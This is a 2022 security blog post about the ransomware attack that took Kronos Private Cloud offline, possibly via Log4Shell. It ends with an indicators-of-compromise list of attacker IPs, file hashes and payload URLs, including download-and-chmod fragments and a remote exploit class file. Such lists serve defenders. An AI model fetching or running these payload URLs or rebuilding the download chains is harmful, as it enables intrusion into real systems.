January 23, 2022

TheCyberThrone

Thinking Security ! Always

Kronos Suffers Ransomware Attack, Suspected on Log4J Exploit

Kronos HCM Transforms Payroll Processing to Drive Accuracy, Efficiency, and  Visibility | Business Wire

A ransomware attack has hit hard on workflow management solutions provider Kronos. and knocked their services offline. The ransomware attack specifically targeted the Kronos Private Cloud. The attack also knocked offline UKG Workforce Central, UKG Tele Staff, Healthcare Extensions and Banking Scheduling Solutions.

UKG, the parent company of Kronos, said that the ransomware attack could result in its services being out for several weeks. The company even suggested that its customers should seek other ways to facilitate payroll payments and human resources-related activities.

Advertisements

At this time, we still do not have an estimated restoration time, and it is likely that the issue may require at least several days to resolve. We continue to recommend that our impacted customers evaluate alternative plans to process time and attendance data for payroll processing, to manage schedules and to manage other related operations important to their organization.

Kronos Statement

Kronos did not reveal the form of ransomware involved in the attack. Reports suggest that the ransomware attack exploited a Log4shell vulnerability. The Log4shell vulnerability is related to the broad Log4j vulnerability gaining headlines over the last few days.

The Log4j vulnerability involves a flaw in the popular open-source tool for collecting diagnostics data from applications written in the Java programming language.

With the Log4j vulnerability impacting many internet-facing systems, Kronos/UKG may be old news soon. There are already reports of a variety of actors using the Log4j exploit. Microsoft has already seen a common precursor to ransomware, Cobalt Strike, landing on Log4j exploited systems. It won’t be long before hearing of ransomware events tied to Log4j as the initial vector.

Advertisements

Developers use libraries written by third-party companies and engineers to speed up the software release process. Log4j is an extremely basic library that allows log writing in Java applications. The way Log4j vulnerability works is that it comes in three layers: cloud products that directly use the Log4j, web applications that use libraries employing Log4j and off-the-shelf software that’s internally deployed on customer servers and endpoints. The first is where Kronos has been hit by ransomware.

Even with the best of intentions, including serious deployment of cybersecurity measures, Log4shell and Log4j is so serious because it bypasses many traditional protection solutions.

Although Kronos Private Cloud was secured by firewalls, encrypted transmissions and multifactor authentication, cybercriminals were still able to breach and encrypt its servers, this extended shutdown will likely present challenges for many organizations as they seek to roll out bonuses and employees look to request time off ahead of the holidays.

Few of notable Kronos customers include Tesla Inc., Marriott International Inc., Yamaha Corp., Aramark Corp., Samsung Electronics Co. Ltd., and Sony Music Entertainment.

Advertisements

Indicators of Compromise – Till Now Accumulated as a Whole

The initial compilation of Ioc’s . This may get extended in coming days

TypeContent
IP203.134.248.176
IP77.40.42.110
IP206.189.99.39
IP68.183.33.144
IP75.119.140.120
IP206.189.29.232
IP138.197.216.230
IP167.99.172.99
IP167.99.204.151
IP159.89.115.238
IP104.244.79.6
IP185.220.101.39
IP104.244.79.6
IP171.25.193.77
IP171.25.193.78
IP171.25.193.20
IP171.25.193.25
IP45.155.205.233
IP172.105.241.146
IP45.83.193.150
IP62.210.130.250
IP109.237.96.124
IP89.234.182.139
URLhttp://62.210.130.250/web/admin/x86;chmod
URL2b794cc70cb33c9b3ae7384157ecb78b54aaddc72f4f9cf90b4a4ce4e6cf8984
URLhttp://62.210.130.250/web/admin/x86_g;chmod
URLhttp://80.71.158.12/Exploit69ogQNSQYz.class
URLhttp://62.210.130.250/web/admin/x86_64;chmod
URLhttp://172.105.241.146:80/wp-content/themes/twentysixteen/s.cmd
Hashbf4f41403280c1b115650d470f9b260a5c9042c04d9bcc2a6ca504a66379b2d6
Hash58e9f72081efff9bdaabd82e3b3efe5b1b9f1666cefe28f429ad7176a6d770ae
Hashed285ad5ac6a8cf13461d6c2874fdcd3bf67002844831f66e21c2d0adda43fa4
Hashdbf88c623cc2ad99d82fa4c575fb105e2083465a47b84d64e2e1a63e183c274e
Hasha38ddff1e797adb39a08876932bc2538d771ff7db23885fb883fec526aff4fc8
Hash7d86841489afd1097576a649094ae1efb79b3147cd162ba019861dfad4e9573b
Hash4bfb0d5022dc499908da4597f3e19f9f64d3cc98ce756a2249c72179d3d75c47
Hash473f15c04122dad810c919b2f3484d46560fd2dd4573f6695d387195816b02a6
Hashb3fae4f84d4303cdbad4696554b4e8d2381ad3faf6e0c3c8d2ce60a4388caa02
Hashdcde6033b205433d6e9855c93740f798951fa3a3f252035a768d9f356fde806d
Hash85338f694c844c8b66d8a1b981bcf38627f95579209b2662182a009d849e1a4c
Hashdb3906edad6009d1886ec1e2a198249b6d99820a3575f8ec80c6ce57f08d521a
Hashec411a34fee49692f196e4dc0a905b25d0667825904862fdba153df5e53183e0
Hasha00a54e3fb8cb83fab38f8714f240ecc13ab9c492584aa571aec5fc71b48732d
Hashc584d1000591efa391386264e0d43ec35f4dbb146cad9390f73358d9c84ee78d
Hash8bdb662843c1f4b120fb4c25a5636008085900cdf9947b1dadb9b672ea6134dc
Hashc830cde8f929c35dad42cbdb6b28447df69ceffe99937bf420d32424df4d076a
Hash6ae3b0cb657e051f97835a6432c2b0f50a651b36b6d4af395bbe9060bb4ef4b2
Hash535e19bf14d8c76ec00a7e8490287ca2e2597cae2de5b8f1f65eb81ef1c2a4c6
Hash42de36e61d454afff5e50e6930961c85b55d681e23931efd248fd9b9b9297239
Hash4f53e4d52efcccdc446017426c15001bb0fe444c7a6cdc9966f8741cf210d997
Hashdf00277045338ceaa6f70a7b8eee178710b3ba51eac28c1142ec802157492de6
Hash28433734bd9e3121e0a0b78238d5131837b9dbe26f1a930bc872bad44e68e44e
Hashcf65f0d33640f2cd0a0b06dd86a5c6353938ccb25f4ffd14116b4884181e0392
Hash5bb84e110d5f18cee47021a024d358227612dd6dac7b97fa781f85c6ad3ccee4
Hashccf02bb919e1a44b13b366ea1b203f98772650475f2a06e9fac4b3c957a7c3fa
Hash815a73e20e90a413662eefe8594414684df3d5723edcd76070e1a5aee864616e
Hash10ef331115cbbd18b5be3f3761e046523f9c95c103484082b18e67a7c36e570c
Hashdc815be299f81c180aa8d2924f1b015f2c46686e866bc410e72de75f7cd41aae
Hash9275f5d57709e2204900d3dae2727f5932f85d3813ad31c9d351def03dd3d03d
Hashf35ccc9978797a895e5bee58fa8c3b7ad6d5ee55386e9e532f141ee8ed2e937d
Hash5256517e6237b888c65c8691f29219b6658d800c23e81d5167c4a8bbd2a0daa3
Hashd4485176aea67cc85f5ccc45bb66166f8bfc715ae4a695f0d870a1f8d848cc3d
Hash3fcc4c1f2f806acfc395144c98b8ba2a80fe1bf5e3ad3397588bbd2610a37100
Hash057a48fe378586b6913d29b4b10162b4b5045277f1be66b7a01fb7e30bd05ef3
Hash5dbd6bb2381bf54563ea15bc9fbb6d7094eaf7184e6975c50f8996f77bfc3f2c
Hashc39b0ea14e7766440c59e5ae5f48adee038d9b1c7a1375b376e966ca12c22cd3
Hash6f38a25482d82cd118c4255f25b9d78d96821d22bab498cdce9cda7a563ca992
Hash54962835992e303928aa909730ce3a50e311068c0960c708e82ab76701db5e6b
Hashe5e9b0f8d72f4e7b9022b7a83c673334d7967981191d2d98f9c57dc97b4caae1
Hash68d793940c28ddff6670be703690dfdf9e77315970c42c4af40ca7261a8570fa
Hash9da0f5ca7c8eab693d090ae759275b9db4ca5acdbcfe4a63d3871e0b17367463
Hash006fc6623fbb961084243cfc327c885f3c57f2eba8ee05fbc4e93e5358778c85
%d bloggers like this: